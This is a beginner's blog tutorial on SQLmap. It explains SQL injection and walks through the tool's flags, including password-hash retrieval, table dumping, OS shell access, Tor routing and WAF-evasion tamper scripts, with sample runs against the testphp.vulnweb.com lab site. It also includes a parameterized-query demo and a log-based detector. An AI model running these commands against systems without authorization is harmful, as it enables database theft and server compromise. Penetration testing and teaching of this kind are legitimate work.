SQLmap — A Comprehensive Guide For Beginners

Anshulchoudhary
25 min read · Aug 5, 2023

SQLmap is a powerful open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It provides a comprehensive set of features that assist both security professionals and beginners in identifying and assessing database vulnerabilities. In this blog post, we will delve into the world of SQLmap and provide a step-by-step guide for beginners to effectively use this tool to secure web applications.

What is SQL injection

SQL injection is a type of attack in which an attacker can inject malicious code into a SQL query. This can be done by entering specially crafted input into a web application that is not properly sanitized. The malicious code can then be executed by the database server, which can allow the attacker to gain access to sensitive data, modify data, or even take control of the database server.

For example, consider a web application that allows users to search for products by category. The application might have a search box where users can enter the name of a category. The application then uses this input to construct a SQL query to search the database for products in the specified category.

SELECT * FROM products WHERE category = '?'

If the application does not properly sanitize the input, an attacker could enter a malicious string like this:

' OR 1 = 1

This string will cause the SQL query to become:

SELECT * FROM products WHERE category = '' OR 1 = 1

The OR operator will always return true, so this query will return all of the products in the database, regardless of the category that the user entered.

SQL injection can be a very serious security vulnerability. It can allow attackers to gain access to sensitive data, modify data, or even take control of a database server. To prevent SQL injection, it is important to properly sanitize all user input before using it to construct SQL queries.

Here are some tips for preventing SQL injection:

  • Use prepared statements instead of dynamic SQL.
  • Sanitize all user input before using it in a SQL query.
  • Use a web application firewall (WAF) to help protect against SQL injection attacks.
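The vulnerable query above and the first prevention tip (prepared statements) side by side, as an added example written for this guide rather than code from the original post. It builds a small in-memory SQLite products table from constructed sample rows; the string-concatenation version returns every product when handed an injection string, while the parameterized version binds the same input as a plain value and finds nothing. One detail: the post's `' OR 1 = 1` leaves the closing quote unbalanced, which most databases reject as a syntax error, so the demo uses the balanced form `' OR '1'='1`.

```python
import sqlite3

# Constructed sample catalogue for the demo (not data from the original post).
PRODUCTS = [
    (1, "Laptop", "electronics"),
    (2, "Headphones", "electronics"),
    (3, "Novel", "books"),
    (4, "Desk lamp", "furniture"),
]


def make_db():
    """Create an in-memory SQLite database holding the products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.commit()
    return conn


def search_vulnerable(conn, category):
    """The pattern from the post: user input pasted into the SQL text, so a quote in
    the input closes the string literal and the rest of the input is parsed as SQL."""
    sql = "SELECT * FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, category):
    """Prepared statement: the driver sends the input as a bound value, so it is
    compared as a plain string and can never change the shape of the query."""
    sql = "SELECT * FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"   # balanced form of the post's ' OR 1 = 1
    print("vulnerable   :", len(search_vulnerable(db, payload)), "rows returned")
    print("parameterized:", len(search_parameterized(db, payload)), "rows returned")
    print("legit lookup :", search_parameterized(db, "books"))
```

Run it as a script: the concatenated query becomes `... WHERE category = '' OR '1'='1'` and returns all four rows, the parameterized query looks for a category literally named `' OR '1'='1` and returns none. Input "sanitizing" (the second tip) is a fallback for places where a value cannot be bound, such as a table name; for ordinary values the bound parameter is the fix.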

What is SQLmap

SQLmap is a powerful open-source penetration testing tool that specializes in detecting and exploiting SQL injection vulnerabilities in web applications. SQL injection is a common attack technique where an attacker can manipulate the SQL queries sent to a database through user input fields on a website. By exploiting these vulnerabilities, attackers can gain unauthorized access to the database, extract sensitive information, modify data, or even execute arbitrary commands.

SQLmap automates the process of identifying and exploiting SQL injection vulnerabilities, making it easier for security professionals and penetration testers to assess the security of web applications. It supports a wide range of database management systems, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and others.

Key Features of SQLmap

  • Detection of SQL Injection: SQLmap automatically detects SQL injection vulnerabilities in web applications by analyzing the response from the application server.
  • Exploitation: Once a SQL injection vulnerability is identified, SQLmap can exploit it to extract information from the database, such as usernames, passwords, and sensitive data.
  • Fingerprinting: SQLmap can determine the type and version of the database management system being used, which helps in selecting appropriate exploit techniques.
  • Enumeration: SQLmap can retrieve information about the database structure, tables, columns, and data types, allowing testers to gain a deeper understanding of the target application’s database.
  • Brute Forcing: SQLmap includes the capability to perform automated brute forcing attacks to guess usernames and passwords in the database.
  • Post-exploitation: Once access to the database is gained, SQLmap enables further exploitation by executing arbitrary commands or uploading malicious files to the server.

Using SQLmap responsibly and ethically is crucial, as it can be misused for unauthorized activities. It is recommended to obtain proper authorization and consent before performing any security assessments using SQLmap or any other penetration testing tool.

Prerequisites For SQLmap

When using SQLmap, there are a few prerequisites that need to be met. Here are the common prerequisites for using SQLmap:

  • Operating System:
  1. SQLmap is compatible with multiple operating systems, including Windows, Linux, and macOS.
  2. Ensure that you are using a supported operating system.
  • Python:
  1. SQLmap is written in Python, so you need to have Python installed on your machine.
  2. Check if Python is installed by opening a command prompt or terminal and typing python --version or python3 --version. If Python is not installed, download and install the latest version from the official Python website (https://www.python.org).
  • Internet Connectivity:
  1. SQLmap relies on internet connectivity to fetch the latest updates, exploit techniques, and perform certain tasks.
  2. Ensure that your machine has a stable internet connection while using SQLmap.

SQLmap Installation

SQLmap can be installed using the pip package manager, which is bundled with Python.

STEP 1

Open a command prompt or terminal

STEP 2

Install python by running following command :

sudo apt install python3

And

sudo apt install python

STEP 3

Type one of the following commands to install SQLmap using pip:

pip install sqlmap

OR

pip3 install sqlmap

STEP 4

After the installation is complete, you can verify the SQLmap installation by typing sqlmap --version in the command prompt or terminal.

If the SQLmap version is displayed, it means SQLmap is installed successfully.

Running SQLmap

You can start SQLmap by running the following command:

sqlmap -h

The -h flag prints the help text, listing all the commands and flags you can use with the tool.

Here you will encounter a number of flags; their meanings are covered under the next heading.

Understanding SQLmap

When you start sqlmap you will encounter many options that you may not be familiar with, so we will go through all of the options in detail to avoid any confusion during the scanning phase:

  • Verbosity :

In SQLMap, the ‘-v’ option is used to control the level of detail in the output generated by the tool. It allows you to adjust the verbosity or the amount of information displayed during the scanning process.

The ‘-v’ option accepts an integer value ranging from 0 to 3, with 0 being the lowest level of verbosity and 3 being the highest. Here’s a breakdown of the levels:

  • Level 0: Only critical information and minimal output are displayed.
  • Level 1: Displays basic information, such as HTTP requests and the target URL.
  • Level 2: Provides more detailed information, including payload data and the results of each request.
  • Level 3: Shows extensive debugging information, such as the HTTP headers and payload sent.

To set the verbosity level, you would use the -v option followed by the desired level. For example:

sqlmap -u http://example.com/login.php -v 2

This command would set the verbosity level to 2, which provides a moderate amount of detail during the scanning process. You can adjust the value to your preference, depending on the amount of information you need for analysis or debugging purposes.

  • Giving Target URL :

In SQLMap, the ‘-u’ option is an abbreviated form of ‘--url’. It is used to specify the target URL of the web application you want to scan for SQL injection vulnerabilities.

When utilizing the ‘-u’ option, you provide the complete URL of the target web application, including the protocol (e.g., http:// or https://) and the specific page or endpoint you wish to test. Here’s an example:

sqlmap -u http://example.com/login.php

In the above command, SQLMap is instructed to scan the ‘login.php’ page of the ‘example.com’ website for SQL injection vulnerabilities.

Similarly to the ‘--url’ option, the ‘-u’ option can also accept additional parameters in the URL, such as query strings or form data, if applicable to your testing scenario. For example:

sqlmap -u "http://example.com/search.php?query=test&page=1"

In this case, SQLMap is targeting the 'search.php' page of the 'example.com' website, with the 'query' and 'page' parameters being part of the URL's query string.

  • Using Google Dorks :

In SQLMap, the ‘-g’ option is used to automatically parse a provided Google search result page and extract potential URLs for SQL injection testing. It allows SQLMap to scrape search engine results and use the identified URLs as targets for SQL injection vulnerability analysis.

When using the ‘-g’ option, you provide a specific search query enclosed in double quotes. SQLMap will then perform a Google search using the provided query and retrieve the search results. It will parse the search result page and extract URLs for further testing. Here’s an example:

sqlmap -g "inurl:index.php?id="

In the above command, SQLMap performs a Google search with the query ‘inurl:index.php?id=’. It identifies search results that include URLs containing ‘index.php?id=’ and automatically extracts those URLs for SQL injection testing.

The ‘-g’ option can be a convenient way to automate the process of finding potential targets for SQL injection testing by leveraging search engines. However, it’s important to use this option responsibly and respect search engine usage policies to avoid any potential issues.

  • Sending Data strings through post requests :

In SQLMap, the ‘--data’ option is used to specify the data parameters to be sent in the request body when performing ‘HTTP POST’ requests during the SQL injection testing process. It allows you to provide the necessary data for simulating form submissions and testing for SQL injection vulnerabilities in ‘POST-based’ scenarios.

When using the ‘--data’ option, you provide the data parameters in the form of key-value pairs, similar to how you would construct a form submission. The data is typically URL-encoded. Here’s an example:

sqlmap -u http://example.com/login.php --data="username=admin&password=12345"

In the above command, SQLMap is instructed to target the ‘login.php’ page of the example.com website using an HTTP POST request. The ‘--data’ option provides the data parameters ‘username=admin’ and ‘password=12345’, which simulate a form submission for the login functionality.

By including the --data option with the appropriate parameter values, SQLMap can interact with the web application and perform SQL injection testing in scenarios where POST requests are involved.

  • Customized Cookie :

In SQLMap, the ‘--cookie’ option is used to provide a specific cookie value to be included in the HTTP requests sent during the SQL injection testing process. It allows you to simulate authenticated sessions or provide session-specific information to SQLMap.

When using the --cookie option, you provide the cookie value in the format of key-value pairs, similar to how cookies are typically represented in HTTP requests. Here’s an example:

sqlmap -u http://example.com/login.php --cookie="sessionid=abc123; user=admin"

In the above command, SQLMap is instructed to target the login.php page of the example.com website and include a specific cookie in the HTTP requests. The --cookie option provides the cookie value sessionid=abc123; user=admin, which is used to simulate an authenticated session with the provided session ID and user information.

By utilizing the --cookie option, you can provide session-specific information to SQLMap, which may be necessary to accurately test SQL injection vulnerabilities in authenticated or session-dependent scenarios.

  • Randomized User Agent :

In SQLMap, the --random-agent option is used to randomize the user agent string in the HTTP headers of the requests sent during the SQL injection testing process. It allows SQLMap to mimic different user agents, making the requests appear more diverse and potentially evading detection or bypassing certain security measures.

When using the --random-agent option, SQLMap will automatically select a random user agent string from a predefined list and include it in the requests it sends. This can help disguise the identity of SQLMap and make it appear as if the requests are originating from various web browsers or clients. Here’s an example:

sqlmap -u http://example.com/login.php --random-agent

In the above command, SQLMap is instructed to target the login.php page of the example.com website and enable the --random-agent option. This will result in SQLMap randomly selecting a user agent string from its list and using it in the requests sent during the SQL injection testing.

By using the --random-agent option, SQLMap enhances its ability to avoid detection or bypass certain security mechanisms that might be specifically targeting default user agent strings associated with automated scanning tools.

  • Using Proxies :

In SQLMap, the --proxy option is used to specify a proxy server through which the HTTP requests will be routed during the SQL injection testing process. It allows SQLMap to pass the requests through a proxy server, which can be helpful for various purposes such as capturing and analyzing network traffic, bypassing network restrictions, or testing security controls.

When using the --proxy option, you provide the details of the proxy server in the form of <proxy type>://<proxy address>:<port>. Here’s an example:

sqlmap -u http://example.com/login.php --proxy="http://127.0.0.1:8080"

In the above command, SQLMap is instructed to target the login.php page of the example.com website and use the proxy server located at 127.0.0.1 on port 8080. The proxy type specified is http, indicating that an HTTP proxy server should be used.

By specifying the --proxy option, SQLMap will route its HTTP requests through the specified proxy server, allowing you to capture and analyze the traffic, apply additional security controls, or bypass network restrictions that may be in place.

  • Using TOR :

In SQLMap, the --tor option is used to route the tool’s HTTP requests through the Tor network during the SQL injection testing process. It allows SQLMap to leverage the Tor network’s anonymity features to anonymize its requests and potentially bypass certain network restrictions or enhance privacy.

When using the --tor option, SQLMap will automatically configure its requests to be routed through the Tor network. This helps to obfuscate the source of the requests and makes it harder to trace them back to the original IP address. Here’s an example:

sqlmap --url=http://example.com/login.php --tor

In the above command, SQLMap is instructed to target the login.php page of the example.com website and enable the --tor option. This will ensure that SQLMap’s requests are routed through the Tor network.

By leveraging the Tor network, SQLMap can potentially bypass IP-based restrictions or filtering mechanisms that may be in place. It also adds an extra layer of anonymity to the SQL injection testing process, making it more difficult to track the origin of the requests.

It’s important to note that using the --tor option requires that you have Tor installed and running on your system. Additionally, the effectiveness of the Tor network in anonymizing your requests can vary depending on various factors, such as the configuration and security measures implemented by the target website.

  • Test Parameters :

In SQLMap, the -p option is used to specify the parameter(s) to be tested for SQL injection vulnerabilities. It allows you to identify and target specific parameters within the target URL or data payload for vulnerability testing.

When using the -p option, you provide the name of the parameter(s) you want to test. Here’s an example:

sqlmap -u http://example.com/login.php -p username,password

In the above command, SQLMap is instructed to target the login.php page of the example.com website and test the username and password parameters for SQL injection vulnerabilities.

By using the -p option, you can focus SQLMap’s testing efforts on specific parameters rather than scanning the entire target URL or data payload. This is useful when you have identified particular parameters that may be more susceptible to SQL injection or want to narrow down the scope of the vulnerability analysis.

It’s important to note that the parameter names provided with -p should correspond to the actual parameter names used in the target URL or data payload. Additionally, you can specify multiple parameters by separating them with commas, as shown in the example above.

  • Force Back-End DBMS :

In SQLMap, the --dbms option is used to specify the database management system (DBMS) that the target web application is using. It allows SQLMap to tailor its SQL injection tests and payloads to the specific DBMS, increasing the effectiveness and accuracy of the vulnerability analysis.

When using the --dbms option, you provide the name of the DBMS as the argument. Here’s an example:

sqlmap --url=http://example.com/login.php --dbms=mysql

In the above command, SQLMap is instructed to target the login.php page of the example.com website and assumes that the web application is using the MySQL DBMS.

By specifying the correct DBMS with --dbms, SQLMap can optimize its techniques and payloads to exploit known vulnerabilities and specific behaviors associated with that particular DBMS. It allows for more accurate and targeted testing, increasing the chances of discovering SQL injection vulnerabilities.

  • Level and Risk :

In SQLMap, the --level and --risk options are used to control the intensity and aggressiveness of the SQL injection testing process.

The --level option determines the depth of the SQL injection tests and the number of techniques used. It ranges from 1 to 5, with 1 being the least aggressive and 5 being the most aggressive. Higher levels increase the testing coverage and the likelihood of discovering vulnerabilities but can also result in increased false positives. Here’s an example:

sqlmap --url=http://example.com/login.php --level=3

In the above command, SQLMap is instructed to target the login.php page of the example.com website and use a moderate testing level of 3.

The --risk option determines the likelihood of triggering false positives during the SQL injection tests. It ranges from 1 to 3, with 1 being the least risky and 3 being the most risky. Higher risk levels increase the chances of detecting SQL injection vulnerabilities but may also generate more false positives. Here’s an example:

sqlmap --url=http://example.com/login.php --risk=2

In the above command, SQLMap is instructed to target the login.php page of the example.com website and use a medium risk level of 2.

By adjusting the --level and --risk options, you can fine-tune the SQL injection testing process based on the specific requirements and risk tolerance of the testing scenario. It allows you to balance the thoroughness of the tests with the potential for false positives.

  • Techniques :

In SQLMap, the --technique option is used to specify the SQL injection technique(s) to be employed during the testing process. It allows you to select specific techniques that SQLMap will use to identify and exploit SQL injection vulnerabilities.

When using the --technique option, you provide the technique(s) as a string of single-letter codes: B (boolean-based blind), E (error-based), U (UNION query), S (stacked queries), T (time-based blind) and Q (inline queries). Here’s an example:

sqlmap --url=http://example.com/login.php --technique=U

In the above command, SQLMap is instructed to target the login.php page of the example.com website and employ only the UNION-based technique to test for SQL injection vulnerabilities.

SQLMap offers multiple techniques to detect and exploit SQL injection vulnerabilities, such as UNION-based, Boolean-based, time-based, error-based, and more. By specifying the appropriate technique(s) with --technique, you can focus the testing efforts on specific techniques known to be effective against the target application.

sqlmap --url=http://example.com/login.php --technique=UB

In the above command, SQLMap will use both the UNION-based and the boolean-based blind techniques during the SQL injection testing process.

It’s important to note that the choice of technique(s) depends on the characteristics and behavior of the target application. It may require some experimentation and trial and error to determine the most effective technique(s) for a specific scenario.

  • Enumeration :

Here’s a brief explanation of the options in SQLMap along with an example for each:

‘-a’ (or --all): Executes all tests and enumeration available. It performs a comprehensive analysis of the target. Example:

sqlmap -u http://example.com/login.php -a

‘-b’ (or --banner): Retrieves the DBMS banner from the target, providing information about the database management system. Example:

sqlmap -u http://example.com/login.php -b

‘--current-user’: Retrieves the username of the current database user. Example:

sqlmap -u http://example.com/login.php --current-user

‘--current-db’: Retrieves the name of the current database. Example:

sqlmap -u http://example.com/login.php --current-db

‘--passwords’: Retrieves password hashes from the target database. Example:

sqlmap -u http://example.com/login.php --passwords

‘--dbs’: Enumerates the names of the databases on the target server. Example:

sqlmap -u http://example.com/login.php --dbs

‘--tables’: Enumerates the names of the tables within a specified database. Example:

sqlmap -u http://example.com/login.php -D dbname --tables

‘--columns’: Enumerates the names of the columns within a specified table. Example:

sqlmap -u http://example.com/login.php -D dbname -T tablename --columns

‘--schema’: Dumps the database schema of a specified database. Example:

sqlmap -u http://example.com/login.php -D dbname --schema

‘--dump’: Dumps the contents of a specified table. Example:

sqlmap -u http://example.com/login.php -D dbname -T tablename --dump

‘--dump-all’: Dumps the contents of all tables in a specified database. Example:

sqlmap -u http://example.com/login.php -D dbname --dump-all

‘-D’: Specifies the target database to be used in various operations. Example:

sqlmap -u http://example.com/login.php -D dbname --tables

‘-T’: Specifies the target table to be used in various operations. Example:

sqlmap -u http://example.com/login.php -D dbname -T tablename --columns

‘-C’: Specifies the target column(s) to be used in various operations (not to be confused with ‘--columns’, which enumerates column names). Example:

sqlmap -u http://example.com/login.php -D dbname -T tablename -C column1,column2 --dump

These examples demonstrate how to use the various options in SQLMap to perform tasks such as retrieving information, enumerating databases, tables, and columns, dumping data from tables, and more.

  • OS Shell :

When using the --os-shell option, SQLMap will attempt to execute commands on the target system’s operating system, providing an interactive shell interface. This can be a powerful feature, as it allows you to execute operating system commands and interact with the target machine directly from within SQLMap.

Here’s an example of how to use the --os-shell option:

sqlmap --url=http://example.com/login.php --os-shell

In the above command, SQLMap is instructed to target the login.php page of the example.com website and launch an operating system shell if a successful SQL injection exploit is detected.

Once the --os-shell option is triggered, you can interact with the target machine’s operating system using command-line commands. This can include tasks such as executing shell commands, navigating the file system, modifying files, or running system-level utilities.

  • Batch Flag :

When using the --batch option, SQLMap will automatically select default options and proceed with the testing process without any prompts for user input. It is useful for automating SQLMap as part of a larger script or for running SQLMap in non-interactive environments.

Here’s an example of how to use the --batch option:

sqlmap --url=http://example.com/login.php --batch

In the above command, SQLMap is instructed to target the login.php page of the example.com website and run in batch mode, without requiring any user interaction.

Scanning With SQLmap

When scanning with SQLMap, the tool utilizes various techniques to analyze the target application’s responses and behavior. It starts by probing the application for potential SQL injection points and then proceeds to exploit them by sending crafted SQL queries. SQLMap supports different types of SQL injection attacks, including error-based, union-based, and time-based techniques.

NORMAL SCANNING

Simple HTTP-GET Based Scan

To perform a simple HTTP GET-based test with SQLMap, you can use the following command:

sqlmap -u <target_url>

Replace <target_url> with the URL of the web application you want to test. For example:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

The command sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --batch initiates an automated SQL injection scan using SQLMap against the specified URL, running in batch mode without user prompts, and saves the results to a file.

[Screenshot: scan output]

This command instructs SQLMap to send GET requests to the specified URL and check for SQL injection vulnerabilities. SQLMap will automatically analyze the responses, detect any injection points, and attempt to exploit them using various techniques.

By default, SQLMap uses a set of predefined tests and payloads to identify and exploit SQL injection vulnerabilities. It will gather information from the target database, such as the DBMS, tables, columns, and data, depending on the level of access it gains.

WAF Evasion scan

Performing Web Application Firewall (WAF) evasion with SQLMap involves using techniques and parameters that can help bypass or overcome the security measures implemented by the WAF. Here’s an overview of some common commands and techniques used for WAF evasion in SQLMap:

  • Tamper Scripts :

SQLMap provides a variety of tamper scripts that modify the generated SQL payloads to evade detection. These scripts alter the payload’s structure, encoding, or other attributes to bypass WAF filters. The --tamper option is used to specify a tamper script.

sqlmap -u <target_url> --tamper=<tamper_script>

For example, you can use the apostrophemask tamper script to encode single quotes in different ways:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tamper=apostrophemask --batch

[Screenshot: scan output]

[Screenshot: injection detected]

  • Randomization:

SQLMap can randomize the order of the injected payload to evade signature-based detection. The --random-agent option is used to randomize the User-Agent header.

sqlmap -u <target_url> --random-agent

For example,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --random-agent

[Screenshot: scan output]

  • Delayed Requests :

Introducing delays between requests can help bypass time-based WAF protections. The --delay option adds a delay, in seconds, between each request.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --delay=0.20

This command initiates a SQLMap scan against the target URL http://testphp.vulnweb.com/listproducts.php?cat=1 with a delay of 0.20 seconds between each request. The delay is introduced to avoid triggering any rate-limiting or detection mechanisms.

By executing this command, SQLMap will start scanning the specified URL for potential SQL injection vulnerabilities. It will send a series of requests with different payloads, analyzing the responses to identify potential injection points. The specified delay of 0.20 seconds between each request is observed to minimize the risk of detection and to ensure that the target application can handle the load.

  • Encoding Techniques :

SQLMap provides encoding techniques to obfuscate the injected payloads. The --hex option converts the payloads into hexadecimal representation, while the --tamper=base64encode option encodes payloads using base64.

sqlmap -u <target_url> --hex

For example,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --hex

By executing this command, SQLMap will start scanning the specified URL while encoding the injected payloads using hexadecimal representation. This encoding technique can help obfuscate the SQL injection payloads, potentially bypassing certain security filters or detection mechanisms that may be in place.

  • HTTP Header Manipulation :

Modifying HTTP headers can help bypass certain WAF restrictions. The --headers option allows you to specify custom headers.

sqlmap -u <target_url> --headers="X-Custom-Header: value"

For example,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --headers="CustomHeader: testing"

is a valid SQLMap command that includes the --headers option to add a custom header to the HTTP request. This command instructs SQLMap to test the URL http://testphp.vulnweb.com/listproducts.php?cat=1 for SQL injection vulnerabilities, while including the custom header CustomHeader: testing in the HTTP request.
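The ‘--random-agent’ section above and this WAF evasion section both raise the same question from the defender's side: what does a sqlmap run look like in the web server's logs? The following is an added example, not code from the original post or from the sqlmap project. It is a small detector that reads Apache combined-format access log lines (the six lines below are constructed for the demo), URL-decodes each request path, and flags sqlmap's default User-Agent (which begins with `sqlmap/`), the tautology, UNION and time-based payload shapes this guide discusses, and any single source address that accumulates several hits. The regexes are illustrative, not a production rule set. The point it makes: ‘--random-agent’ removes the user-agent signal, but the decoded payloads and the request volume from one address remain visible.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access log lines for the demo
# (not real traffic and not from the original post).
LOG_LINES = [
    '10.0.0.5 - - [05/Aug/2023:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"',
    '10.0.0.9 - - [05/Aug/2023:10:00:02 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "sqlmap/1.7.8#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [05/Aug/2023:10:00:03 +0000] "GET /listproducts.php?cat=1%27%20OR%201%3D1 HTTP/1.1" 200 9876 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/115.0"',
    '10.0.0.9 - - [05/Aug/2023:10:00:04 +0000] "GET /listproducts.php?cat=1%20UNION%20SELECT%201%2C2%2C3 HTTP/1.1" 500 312 "-" "Mozilla/5.0 (Macintosh) Safari/16.5"',
    '10.0.0.9 - - [05/Aug/2023:10:00:05 +0000] "GET /listproducts.php?cat=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"',
    '10.0.0.7 - - [05/Aug/2023:10:00:06 +0000] "GET /search.php?query=books%20%26%20more HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (Windows NT 10.0) Edge/115.0"',
]

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Illustrative signatures for the payload classes this guide discusses;
# a real deployment tunes these and pairs them with WAF/IDS rules.
PAYLOAD_PATTERNS = {
    "tautology": re.compile(r"'\s*or\s+\S+\s*=\s*\S+", re.I),                # ' OR 1=1
    "union": re.compile(r"\bunion\b.*\bselect\b", re.I),                      # UNION SELECT ...
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I),
}


def classify(line):
    """Parse one access-log line; return (fields, reasons). reasons is empty when benign."""
    match = LOG_RE.match(line)
    if not match:
        return None, ["unparseable line"]
    fields = match.groupdict()
    reasons = []
    # sqlmap's default User-Agent names the tool; --random-agent removes this signal.
    if fields["agent"].lower().startswith("sqlmap/"):
        reasons.append("default sqlmap User-Agent")
    # Decode percent-encoding so encoded payloads are matched in their plain form.
    decoded = unquote_plus(fields["path"])
    for name, pattern in PAYLOAD_PATTERNS.items():
        if pattern.search(decoded):
            reasons.append(f"{name} payload in query string")
    return fields, reasons


def scan(lines):
    """Return one finding per suspicious line: {'ip', 'path', 'reasons'}."""
    findings = []
    for line in lines:
        fields, reasons = classify(line)
        if reasons:
            findings.append({
                "ip": fields["ip"] if fields else None,
                "path": fields["path"] if fields else line,
                "reasons": reasons,
            })
    return findings


def noisy_sources(findings, threshold=3):
    """Addresses with at least `threshold` findings: the volume signal survives UA changes."""
    counts = {}
    for finding in findings:
        counts[finding["ip"]] = counts.get(finding["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = scan(LOG_LINES)
    for hit in hits:
        print(hit["ip"], hit["path"], "->", "; ".join(hit["reasons"]))
    print("sources over threshold:", noisy_sources(hits))
```

On the constructed input, four of the six lines are flagged and 10.0.0.9 crosses the per-source threshold even though only one of its requests carried the sqlmap user agent. Tamper scripts that rewrite quotes or keywords can defeat the individual regexes, which is why the per-address count is kept as a separate signal.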

Level and Risk

In this part we will discuss the level and risk options in sqlmap. First, let's go through each value of --level and --risk.

--level

  • Level 1 (--level=1):

Performs basic SQL injection tests. It includes simple payload checks and minimal impact on the target application.

sqlmap -u <target_url> --level=1

  • Level 2 (--level=2):

Extends the tests to more SQL injection techniques, such as time-based and error-based blind SQL injections. It increases the number of tests performed.

sqlmap -u <target_url> --level=2

  • Level 3 (--level=3):

Further expands the tests to cover more advanced SQL injection techniques and algorithms. It increases the number of requests made to the target application.

sqlmap -u <target_url> --level=3

  • Level 4 (--level=4):

Performs thorough tests, including deep analysis and in-depth detection of SQL injection vulnerabilities. It may significantly impact the target application’s performance.

sqlmap -u <target_url> --level=4

  • Level 5 (--level=5):

This is the highest level, involving the most comprehensive and exhaustive tests. It combines all available SQLMap techniques and payloads, covering a wide range of injection scenarios.

sqlmap -u <target_url> --level=5

--risk

  • Risk 1 (--risk=1):

Performs low-risk tests, reducing the chance of affecting the target application while still aiming to identify vulnerabilities.

sqlmap -u <target_url> --risk=1

  • Risk 2 (--risk=2):

Strikes a balance between risk and thoroughness. It increases the aggressiveness of the scanning process, potentially identifying more vulnerabilities.

sqlmap -u <target_url> --risk=2

  • Risk 3 (--risk=3):

Performs high-risk tests, increasing the chances of exploiting potential vulnerabilities. It might have a greater impact on the target application.

sqlmap -u <target_url> --risk=3

for example ,

sqlmap -u http://example.com/listproducts.php?cat=1 --level=3 --risk=2 --batch

By executing this command, SQLMap will start scanning the specified URL with the specified level (3) and risk (2). The batch mode will ensure that the scan runs without requiring user input, making it suitable for automated or scripted scanning.

Retrieving Information

--dbs

This command retrieves the list of available databases on the target server. It identifies the databases present in the database management system (DBMS).

sqlmap -u <target_url> --dbs

for example ,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs --batch

[Screenshot: scan output]

[Screenshot: injection detected]

By executing this command, SQLMap will initiate the scan against the specified URL and retrieve the list of databases present on the target server. The batch mode ensures that the scan runs without requiring user input, making it suitable for automated or scripted scanning.

This output gives us two databases:

  • acuart
  • information_schema

Now let's dump the tables of acuart.

--tables -D <database>

This command fetches the list of tables within a specified database. It helps you identify the tables present in the selected database.

sqlmap -u <target_url> --tables -D <database>

For example:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart

OUTPUT

This output gives us 8 tables:

  • artists
  • carts
  • categ
  • featured
  • guestbook
  • pictures
  • products
  • users

Let's dump the columns of the users table.

--columns -D <database> -T <table>:

This command retrieves the columns within a specified table of a database. It helps you identify the columns present in the selected table.

sqlmap -u <target_url> --columns -D <database> -T <table>

For example:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -D acuart -T users --batch

This command initiates a SQLMap scan against the target URL http://testphp.vulnweb.com/listproducts.php?cat=1 with the --columns option enabled. It retrieves the columns of the users table in the acuart database. The --batch option enables batch mode, which answers every prompt with its default so the scan runs without user input.

OUTPUT OF DATABASE

To save the output to a file, you can use the shell redirection operator (> or >>).

>: Redirects the output to a new file, replacing the contents of the file if it already exists. If the file doesn’t exist, it will be created.

sqlmap -u <target_url> --dump -D <database> -T <table> --batch > output.txt

>>: Redirects the output to a file, appending the output to the end of the file if it exists. If the file doesn’t exist, it will be created.

sqlmap -u <target_url> --dump -D <database> -T <table> --batch >> output.txt

Scanning request TXT files

Scanning POST and GET HTTP request files in SQLMap involves using the -r option to specify the request files. Let’s go through the commands step by step:

  • Scanning POST HTTP Request File:

To scan a POST HTTP request file, follow these steps:

  • Save the HTTP POST request into a file, such as post_request.txt, with the necessary headers, parameters, and body intact.

POST REQUEST FILE

POST /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Content-Length: 93
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://testphp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testphp.vulnweb.com/comment.php?aid=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
name=hacklock&comment=hey+u+are+hacked+&Submit=Submit&phpaction=echo+%24_POST%5Bcomment%5D%3B

  • Run SQLMap with the -r option followed by the path to the POST request file:

sqlmap -r post_request.txt

